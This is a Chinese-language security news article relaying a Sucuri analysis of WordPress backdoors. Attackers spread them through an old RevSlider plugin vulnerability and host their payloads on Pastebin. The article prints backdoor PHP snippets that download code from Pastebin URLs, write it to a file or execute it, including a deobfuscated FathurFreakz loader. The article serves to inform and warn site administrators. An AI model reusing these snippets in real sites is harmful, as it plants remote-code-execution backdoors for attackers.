快速分享文本、代碼的網(wǎng)站Pastebin常常被黑客們用來(lái)分享自己的庫(kù)、竊取的數(shù)據(jù)和其他代碼,而現(xiàn)在它真的被用于黑客攻擊了。
安全研究人員曾發(fā)現(xiàn)黑客們通過(guò)Gmail 草稿、Evernote等平臺(tái)控制僵尸網(wǎng)絡(luò),而且近日又發(fā)現(xiàn)一個(gè)新玩法 :黑客利用流行的WordPress插件RevSlider的老版本漏洞傳播新的后門(mén)變種,使用Pastebin.com放置惡意軟件。下面就讓我們一起來(lái)看看黑客們的新創(chuàng)意吧。
另類(lèi)后門(mén)
Sucuri公司近日發(fā)表了一篇博客,該博客詳細(xì)解釋了黑客是如何利用舊版本的RevSlider WordPress插件來(lái)傳播一種新型后門(mén),而該后門(mén)利用Pastebin.com網(wǎng)站服務(wù)來(lái)托管惡意代碼文件。
惡意軟件高級(jí)研究員Denis Sinegubko在博客中寫(xiě)道:
“這或多或少可以算得上是一個(gè)典型的后門(mén)。它從遠(yuǎn)程服務(wù)器下載惡意代碼,并在受害網(wǎng)站上將這些惡意代碼保存到一個(gè)文件中,使其隨時(shí)可被執(zhí)行。不過(guò),比較有趣的一點(diǎn)是其遠(yuǎn)程服務(wù)器的選擇,黑客既沒(méi)將惡意代碼文件托管在自己的網(wǎng)站,也不是肉雞網(wǎng)站,而是在最受歡迎的Web應(yīng)用網(wǎng)站Pastebin.com上。”
攻擊者通過(guò)掃描目標(biāo)網(wǎng)站來(lái)尋找含有漏洞的RevSlider插件。一旦發(fā)現(xiàn),他們會(huì)利用RevSlider的另一個(gè)漏洞將后門(mén)代碼上傳到該網(wǎng)站。
if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin.com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php",'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}
關(guān)鍵后門(mén)代碼
這是一份稍微復(fù)雜點(diǎn)的后門(mén)樣本,是通過(guò)RevSlider漏洞上傳的:
從截圖中你可以看到這段代碼將一段經(jīng)過(guò)Base64編碼的內(nèi)容注入WordPress核心文件wp-links-opml.php中的$temp變量。以下是經(jīng)過(guò)解密的$temp內(nèi)容:
你可以看到它從Pastebin下載代碼并立即執(zhí)行。但這次只有當(dāng)攻擊者提供wp_nonce_once中的請(qǐng)求參數(shù),也就是Pastebin的文章ID時(shí)才會(huì)運(yùn)行。wp_nonce_once參數(shù)的使用使得管理員難以追蹤惡意代碼的具體地址(防止了網(wǎng)址被屏蔽),同時(shí)又增加了后門(mén)的靈活性———這樣它就能夠下載執(zhí)行任何Pastebin上的代碼——哪怕是那些一開(kāi)始不存在的代碼————只需要向wp-links-opml.php提供ID就行了。
FathurFreakz編碼器
印度尼西亞黑客們有一款編碼器與Pastebin配合默契。名字叫做PHP Encryptor by Yogyakarta Black Hat 或者是 by FathurFreakz。在 Pastebin.com網(wǎng)站上粘帖創(chuàng)建PHP代碼,軟件就會(huì)加密那個(gè)Pastebin網(wǎng)址,生成混淆后的代碼:
解密后:
function FathurFreakz($ct3){
xcurl('http://pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);
這段代碼會(huì)下載執(zhí)行Pastebin上的代碼(使用xcurl函數(shù)),ID在CODE常量中,并且經(jīng)過(guò)加密。你可以看到另外一種Pastebin網(wǎng)址種類(lèi):download.php,基本上它跟raw.php一樣,但它提供HTTP頭,使得瀏覽器不會(huì)顯示內(nèi)容,而是直接以文件形式下載。
經(jīng)過(guò)解密的代碼(看起來(lái)他們超愛(ài)用Pastebin……):
給站長(zhǎng)們敲響警鐘
黑客在實(shí)時(shí)攻擊的時(shí)候大規(guī)模利用Pastebin網(wǎng)站,這給網(wǎng)站管理員敲響了警鐘,提示他們要時(shí)刻維護(hù)網(wǎng)站的CMS(內(nèi)容管理系統(tǒng))以防止插件被惡意利用。
就在幾周前,一款新型針對(duì)WordPress的惡意軟件SoakSoak,其主要攻擊手段也是通過(guò)RevSlider的漏洞,上傳一個(gè)后門(mén),然后對(duì)所有使用相同服務(wù)器的網(wǎng)站進(jìn)行感染。當(dāng)時(shí)SoakSoak攻陷了約10萬(wàn)個(gè)WordPress站。